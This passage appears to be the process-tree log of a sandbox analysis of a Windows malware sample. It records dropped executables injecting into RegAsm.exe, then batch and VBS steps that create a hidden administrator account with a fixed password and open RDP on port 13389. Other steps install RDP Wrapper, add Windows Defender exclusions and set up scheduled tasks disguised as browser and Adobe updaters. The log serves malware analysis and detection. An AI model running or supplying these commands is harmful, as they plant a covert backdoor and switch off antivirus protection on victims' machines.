    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2644
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:2632
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
      Uno.exe.com f
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1976
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1148
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1696
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:2452
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
      Inebriato.exe.com R
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2016
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2276
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\1192.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\914.vbs
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2104
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\1192.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\914.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\21.vbs" GuDNaDzHza JVprARXEmX "C:\Users\Admin\AppData\Roaming\riHTr\584.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\KFfyLYxQ.bat" "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll"
        7⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\21.vbs" GuDNaDzHza JVprARXEmX "C:\Users\Admin\AppData\Roaming\riHTr\584.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\KFfyLYxQ.bat" "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll" /tn "CCleanerSkipUAC34"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:912
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll" /tn "CCleanerSkipUAC34"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1484
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\321.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\914.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1228
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\321.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\914.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll" /tn "Обновление Браузера Яндекс40"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1400
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll" /tn "Обновление Браузера Яндекс40"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\riHTr\SDghUtOVkF.bat GuDNaDzHza JVprARXEmX"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1380
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1660
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3004
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
        
        C:\Windows\SysWOW64\net.exe
        
        net user GuDNaDzHza JVprARXEmX /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:704
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user GuDNaDzHza JVprARXEmX /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2136
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators GuDNaDzHza /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2420
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators GuDNaDzHza /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2084
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" GuDNaDzHza /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1512
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" GuDNaDzHza /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1940
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2760
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v GuDNaDzHza /t REG_DWORD /d "00000000" /f
        8⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:2648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2708
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2772
        
        C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2668
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        8⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1292
        
        C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1108
        
        C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1308
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        
        PID:788
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:304
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2564
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2236
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:1364
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1352
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2368
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\184.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\720.vbs" "VjFoQ2MxQlZaREZTUlRWb1VraHdTV1Z0Ulcxa00yaEtWMFF4UzFadVFubFJWa3BaVWxjeFdVcHRlSFpqUm14NFVXNVZPV1V3CldUUlNha3BDVGxSa1JFeFZSWGhTYWxWMENrNUVhRUpPVXpGRFRXcEJOVXhVVmtOTmFsRXlUVlJyTTA1VlJYaE9NekE5" "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2556
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\riHTr\184.vbs" "C:\Users\Admin\AppData\Roaming\riHTr\720.vbs" "VjFoQ2MxQlZaREZTUlRWb1VraHdTV1Z0Ulcxa00yaEtWMFF4UzFadVFubFJWa3BaVWxjeFdVcHRlSFpqUm14NFVXNVZPV1V3CldUUlNha3BDVGxSa1JFeFZSWGhTYWxWMENrNUVhRUpPVXpGRFRXcEJOVXhVVmtOTmFsRXlUVlJyTTA1VlJYaE9NekE5" "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll" /tn "Adobe Flash Player Updater60"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2688
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\riHTr\qHH.dll" /tn "Adobe Flash Player Updater60"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1164
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2220

C:\Windows\system32\taskeng.exe
taskeng.exe {E96060FF-CCAE-483A-B2C0-21C6DF1FCACF} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
1⤵
PID:2572
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\riHTr\584.vbs" GuDNaDzHza JVprARXEmX "C:\Users\Admin\AppData\Roaming\riHTr\KFfyLYxQ.bat"
  2⤵
  PID:1240
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\riHTr\KFfyLYxQ.bat
    3⤵
    - Drops file in System32 directory
    PID:1748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
      4⤵
      PID:2380
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        5⤵
        
        PID:1744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
      4⤵
      PID:332
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        5⤵
        
        PID:1972
  - - C:\Windows\system32\net.exe
      net user GuDNaDzHza JVprARXEmX /add
      4⤵
      PID:1696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user GuDNaDzHza JVprARXEmX /add
        5⤵
        
        PID:1876
  - - C:\Windows\system32\net.exe
      net localgroup Administrators GuDNaDzHza /add
      4⤵
      PID:2748
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators GuDNaDzHza /add
        5⤵
        
        PID:2892
  - - C:\Windows\system32\net.exe
      net localgroup Remote Desktop Users GuDNaDzHza /add
      4⤵
      PID:2604
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users GuDNaDzHza /add
        5⤵
        
        PID:2712
  - - C:\Windows\system32\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:2060
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:580
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v GuDNaDzHza /t REG_DWORD /d "00000000" /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:2440
  - - C:\Windows\system32\reg.exe
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
      4⤵
      PID:1768
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:3064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1672
  - - C:\Windows\system32\timeout.exe
      Timeout /t 15
      4⤵
      Delays execution with timeout.exe
      PID:928
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\riHTr\720.vbs" VjFoQ2MxQlZaREZTUlRWb1VraHdTV1Z0Ulcxa00yaEtWMFF4UzFadVFubFJWa3BaVWxjeFdVcHRlSFpqUm14NFVXNVZPV1V3CldUUlNha3BDVGxSa1JFeFZSWGhTYWxWMENrNUVhRUpPVXpGRFRXcEJOVXhVVmtOTmFsRXlUVlJyTTA1VlJYaE9NekE5
  2⤵
  - Blocklisted process makes network request
  PID:2836
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\riHTr\584.vbs" GuDNaDzHza JVprARXEmX "C:\Users\Admin\AppData\Roaming\riHTr\KFfyLYxQ.bat"
  2⤵
  PID:3032
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\riHTr\KFfyLYxQ.bat
    3⤵
    - Drops file in System32 directory
    PID:408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
      4⤵
      PID:2432
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        5⤵
        
        PID:1752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
      4⤵
      PID:1036
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        5⤵
        
        PID:2344
  - - C:\Windows\system32\net.exe
      net user GuDNaDzHza JVprARXEmX /add
      4⤵
      PID:2008
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user GuDNaDzHza JVprARXEmX /add
        5⤵
        
        PID:1540
  - - C:\Windows\system32\net.exe
      net localgroup Administrators GuDNaDzHza /add
      4⤵
      PID:2096
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators GuDNaDzHza /add
        5⤵
        
        PID:548
  - - C:\Windows\system32\net.exe
      net localgroup Remote Desktop Users GuDNaDzHza /add
      4⤵
      PID:1800
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users GuDNaDzHza /add
        5⤵
        
        PID:2996
  - - C:\Windows\system32\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:1484
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:912
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v GuDNaDzHza /t REG_DWORD /d "00000000" /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:1880
  - - C:\Windows\system32\reg.exe
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
      4⤵
      PID:1284
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
